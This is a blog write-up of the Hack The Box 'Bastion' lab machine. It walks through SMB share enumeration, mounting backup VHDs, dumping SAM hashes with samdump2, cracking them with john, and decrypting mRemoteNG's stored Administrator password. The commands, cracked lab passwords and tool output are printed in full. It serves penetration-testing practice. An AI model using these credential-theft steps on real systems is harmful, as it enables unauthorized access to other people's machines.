Hack The Box - Bastion
I found this machine a little hard at first as this was my first Windows machine and I wasn’t adept at exploiting Windows. After reading various write ups and guides online, I was able to root this machine ! :)
Configuration
The operating systems that I will be using to tackle this machine is a Kali Linux VM and a Windows Commando VM.
What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts.
1
$ echo "10.10.10.134 bastion.htb" >> /etc/hosts
Reconnaissance
Using nmap, we are able to determine the open ports and running services on the machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
$ nmap -sV -sT -sC bastion.htb
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.26s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -39m29s, deviation: 1h09m15s, median: 29s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2019-08-17T09:30:22+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-17 03:30:24
|_ start_date: 2019-08-17 03:09:17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.52 seconds
Enumeration (1)
Not much can be done with the ssh service as we do not have any credentials on hand so lets come back to it later. As for the smb service, maybe we can try logging into it and see what we can find ?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ smbclient -L bastion.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
$ smbmap -H bastion.htb -U Guest
[+] Finding open SMB ports....
[+] User SMB session establishd on bastion.htb...
[+] IP: bastion.htb:445 Name: bastion.htb
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY
Alright, the Backups share seems interesting. Lets check it out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ smbclient //bastion.htb/Backups
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Aug 28 03:22:24 2019
.. D 0 Wed Aug 28 03:22:24 2019
AfupChGEOm D 0 Wed Aug 28 03:17:54 2019
ApQryGFzjG D 0 Wed Aug 28 03:19:48 2019
gcMteSJf.exe A 15872 Wed Aug 28 03:22:37 2019
hBHyUtVj.exe A 2500 Wed Aug 28 03:22:10 2019
kyMeCYlTrO D 0 Wed Aug 28 03:17:40 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup D 0 Fri Feb 22 07:44:02 2019
7735807 blocks of size 4096. 2776236 blocks available
Looks like someone left a note.txt on the share.
1
2
smb: \> more note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
At this point of time, I did not understand the meaning of this message so I simply ignored it. Another thing that caught my attention was the WindowsImageBackup directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
smb: \> cd WindowsImageBackup
smb: \WindowsImageBackup\> dir
. D 0 Fri Feb 22 07:44:02 2019
.. D 0 Fri Feb 22 07:44:02 2019
L4mpje-PC D 0 Fri Feb 22 07:45:32 2019
7735807 blocks of size 4096. 2776046 blocks available
smb: \WindowsImageBackup\> cd L4mpje-PC
smb: \WindowsImageBackup\L4mpje-PC\> dir
. D 0 Fri Feb 22 07:45:32 2019
.. D 0 Fri Feb 22 07:45:32 2019
Backup 2019-02-22 124351 D 0 Fri Feb 22 07:45:32 2019
Catalog D 0 Fri Feb 22 07:45:32 2019
MediaId A 16 Fri Feb 22 07:44:02 2019
SPPMetadataCache D 0 Fri Feb 22 07:45:32 2019
7735807 blocks of size 4096. 2776046 blocks available
Oh no this feels like a rabbit hole already but Backup 2019-02-22 124351 seems hopeful.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
smb: \WindowsImageBackup\L4mpje-PC\> cd "Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. D 0 Fri Feb 22 07:45:32 2019
.. D 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd A 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd A 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml A 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml A 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml A 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml A 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml A 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml A 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml A 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml A 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml A 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml A 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml A 2374620 Fri Feb 22 07:45:32 2019
7735807 blocks of size 4096. 2776046 blocks available
The .vhd files seem worth checking out. Lets try downloading them.
1
2
3
4
5
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> get 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
getting file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
of size 37761024 as 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE).
The connection is disconnected now
What just happened ? NT_STATUS_IO_TIMEOUT ? Was the file too big to be transferred ? This was where I finally understood the message when it said don't transfer the entire backup file and the VPN to the subsidiary office is too slow. Seems like we can’t rely on smbclient to retrieve the files :/ This was where it struck me to use a Windows VM. I had heard of a Offensive Windows distribution VM by FireEye and felt that it was a good chance to try it out!
After setting up the Commando VM, I attempted to access the share and it worked !
After downloading the .vhd files which tooked quite a while, I mounted both of them.
Seems like a rather normal looking Windows file system. After looking through the user folders, I was not able to find anything but I found the SAM and SYSTEM files in the Windows\System32\config folder. Maybe we can dump out the passwords using these files ?
Using the samdump2 command, we were able to extract the account hashes.
1
2
3
4
5
$ samdump2 SYSTEM SAM -o hash.txt
$ cat hash.txt
\*disabled\* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
\*disabled\* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Following up, we used john to cracked the NT hashes in hash.txt along with the rockyou.txt password list.
1
2
3
4
5
6
7
8
9
10
11
$ john --format=nt hash.txt -wordlist:/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 128/128 AVX 4x3])
Remaining 1 password hash
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:01 DONE (2019-08-17 07:47) 0.5434g/s 5106Kp/s 5106Kc/s 5106KC/s buresres..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
user.txt
Bingo, we got it ! With the password bureaulampje, we will now attempt to login via ssh using L4mpje’s credentials. The user.txt resided on his Desktop.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ ssh L4mpje@bastion.htb
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>cd Desktop
l4mpje@BASTION C:\Users\L4mpje\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
23-02-2019 10:07 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 11.381.809.152 bytes free
l4mpje@BASTION C:\Users\L4mpje\Desktop>more user.txt
9bfeXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Enumeration (2)
As l4mpje, we first checked out the installed programs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ dir C:\Program Files (x86)
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Program Files (x86)
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
16-07-2016 15:23 <DIR> Common Files
23-02-2019 10:38 <DIR> Internet Explorer
16-07-2016 15:23 <DIR> Microsoft.NET
22-02-2019 15:01 <DIR> mRemoteNG
23-02-2019 11:22 <DIR> Windows Defender
23-02-2019 10:38 <DIR> Windows Mail
23-02-2019 11:22 <DIR> Windows Media Player
16-07-2016 15:23 <DIR> Windows Multimedia Platform
16-07-2016 15:23 <DIR> Windows NT
23-02-2019 11:22 <DIR> Windows Photo Viewer
16-07-2016 15:23 <DIR> Windows Portable Devices
16-07-2016 15:23 <DIR> WindowsPowerShell
0 File(s) 0 bytes
14 Dir(s) 11.404.402.688 bytes free
mRemoteNG ? This doesn’t seem like a default installed Windows program.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
$ dir C:\Program Files (x86)\mRemoteNG
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Program Files (x86)\mRemoteNG
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
18-10-2018 23:31 36.208 ADTree.dll
18-10-2018 23:31 346.992 AxInterop.MSTSCLib.dll
18-10-2018 23:31 83.824 AxInterop.WFICALib.dll
18-10-2018 23:31 2.243.440 BouncyCastle.Crypto.dll
18-10-2018 23:30 71.022 Changelog.txt
18-10-2018 23:30 3.224 Credits.txt
22-02-2019 15:01 <DIR> cs-CZ
22-02-2019 15:01 <DIR> de
22-02-2019 15:01 <DIR> el
22-02-2019 15:01 <DIR> en-US
22-02-2019 15:01 <DIR> es
22-02-2019 15:01 <DIR> es-AR
22-02-2019 15:01 <DIR> Firefox
22-02-2019 15:01 <DIR> fr
18-10-2018 23:31 1.966.960 Geckofx-Core.dll
05-07-2017 01:31 4.482.560 Geckofx-Core.pdb
18-10-2018 23:31 143.728 Geckofx-Winforms.dll
05-07-2017 01:31 259.584 Geckofx-Winforms.pdb
22-02-2019 15:01 <DIR> Help
22-02-2019 15:01 <DIR> hu
22-02-2019 15:01 <DIR> Icons
18-10-2018 23:31 607.088 Interop.MSTSCLib.dll
18-10-2018 23:31 131.440 Interop.WFICALib.dll
22-02-2019 15:01 <DIR> it
22-02-2019 15:01 <DIR> ja-JP
22-02-2019 15:01 <DIR> ko-KR
07-10-2018 13:21 18.326 License.txt
18-10-2018 23:31 283.504 log4net.dll
18-10-2018 23:31 412.528 MagicLibrary.dll
18-10-2018 23:31 1.552.240 mRemoteNG.exe
07-10-2018 13:21 28.317 mRemoteNG.exe.config
18-10-2018 23:30 2.405.888 mRemoteNG.pdb
22-02-2019 15:01 <DIR> nb-NO
22-02-2019 15:01 <DIR> nl
18-10-2018 23:31 451.952 ObjectListView.dll
22-02-2019 15:01 <DIR> pl
22-02-2019 15:01 <DIR> pt
22-02-2019 15:01 <DIR> pt-BR
07-10-2018 13:21 707.952 PuTTYNG.exe
07-10-2018 13:21 887 Readme.txt
18-10-2018 23:31 415.088 Renci.SshNet.dll
22-02-2019 15:01 <DIR> ru
22-02-2019 15:01 <DIR> Schemas
22-02-2019 15:01 <DIR> Themes
22-02-2019 15:01 <DIR> tr-TR
22-02-2019 15:01 <DIR> uk
18-10-2018 23:31 152.432 VncSharp.dll
18-10-2018 23:31 312.176 WeifenLuo.WinFormsUI.Docking.dll
18-10-2018 23:31 55.152 WeifenLuo.WinFormsUI.Docking.ThemeVS2003.dll
18-10-2018 23:31 168.816 WeifenLuo.WinFormsUI.Docking.ThemeVS2012.dll
18-10-2018 23:31 217.968 WeifenLuo.WinFormsUI.Docking.ThemeVS2013.dll
18-10-2018 23:31 243.056 WeifenLuo.WinFormsUI.Docking.ThemeVS2015.dll
22-02-2019 15:01 <DIR> zh-CN
22-02-2019 15:01 <DIR> zh-TW
28 File(s) 17.802.352 bytes
28 Dir(s) 11.360.325.632 bytes free
Lets see what version of mRemoteNG is installed by checking the Changelog.txt.
1
2
3
4
5
6
7
8
1.76.11 (2018-10-18):
Fixes:
------
#1139: Feature "Reconnect to previously opened sessions" not working
#1136: Putty window not maximized
...
Seems like the version is 1.76.10. Lets see if we can find any exploits regarding mRemoteNG.
I came across this post-exploitation module for Metasploit that harvests the credentials from mRemoteNG’s password storage file. Since I did not have meterpreter session on the machine, I found some other alternative.
The password storage file was stored in the %appdata%\mRemoteNG.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
$ dir %appdata%\mRemoteNG
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 15:03 6.316 confCons.xml
22-02-2019 15:02 6.194 confCons.xml.20190222-1402277353.backup
22-02-2019 15:02 6.206 confCons.xml.20190222-1402339071.backup
22-02-2019 15:02 6.218 confCons.xml.20190222-1402379227.backup
22-02-2019 15:02 6.231 confCons.xml.20190222-1403070644.backup
22-02-2019 15:03 6.319 confCons.xml.20190222-1403100488.backup
22-02-2019 15:03 6.318 confCons.xml.20190222-1403220026.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403261268.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403272831.backup
22-02-2019 15:03 6.315 confCons.xml.20190222-1403433299.backup
22-02-2019 15:03 6.316 confCons.xml.20190222-1403486580.backup
22-02-2019 15:03 51 extApps.xml
17-08-2019 15:56 6.370 mRemoteNG.log
22-02-2019 15:03 2.245 pnlLayout.xml
22-02-2019 15:01 <DIR> Themes
14 File(s) 77.730 bytes
3 Dir(s) 11.404.337.152 bytes free
$ more %appdata%\mRemoteNG\confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" Bl
ockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1
f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4
f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xD
qE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="33
89" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthen
ticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Color
s16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFo
ntSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPo
rts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic
" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCom
pression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCPr
oxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCVi
ewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGate
wayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" Inheri
tDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="f
alse" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" In
heritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDi
skDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" Inher
itRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false"
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngi
ne="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" I
nheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" Inherit
PreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="f
alse" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="
false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPas
sword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGate
wayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" Inheri
tRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8
f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U
9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" C
onnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticat
ionLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bi
t" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmo
othing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="
false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" Red
irectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompress
ion="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPo
rt="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnl
y="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUs
ername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDesc
ription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false"
InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" Inherit
Password="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDri
ves="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRed
irectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" Inhe
ritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="f
alse" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" Inheri
tRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreEx
tApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false"
InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false
" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword
="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUs
ageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGa
tewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
In the <Node> element, we see :
1
2
3
4
username: Administrator
password: aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
hostname: 127.0.0.1
protocol: RDP
From this, we can guess that the password field contains the encrypted version of the Administrator’s password. Using the mremoteng_decrypt.py,
1
2
$ python mremoteng_decrypt.py aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
Neat ! We got the Administrator’s password !
root.txt
Lets see if we can login into the Administrator’s account via ssh.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
ssh Administator@bastion.htb
Administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>cd Desktop
administrator@BASTION C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 0CB3-C487
Directory of C:\Users\Administrator\Desktop
23-02-2019 10:40 <DIR> .
23-02-2019 10:40 <DIR> ..
23-02-2019 10:07 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 11.348.910.080 bytes free
administrator@BASTION C:\Users\Administrator\Desktop>more root.txt
9588XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Rooted ! Thank you for reading and look forward for more writeups and articles !
This post is licensed under CC BY 4.0 by the author.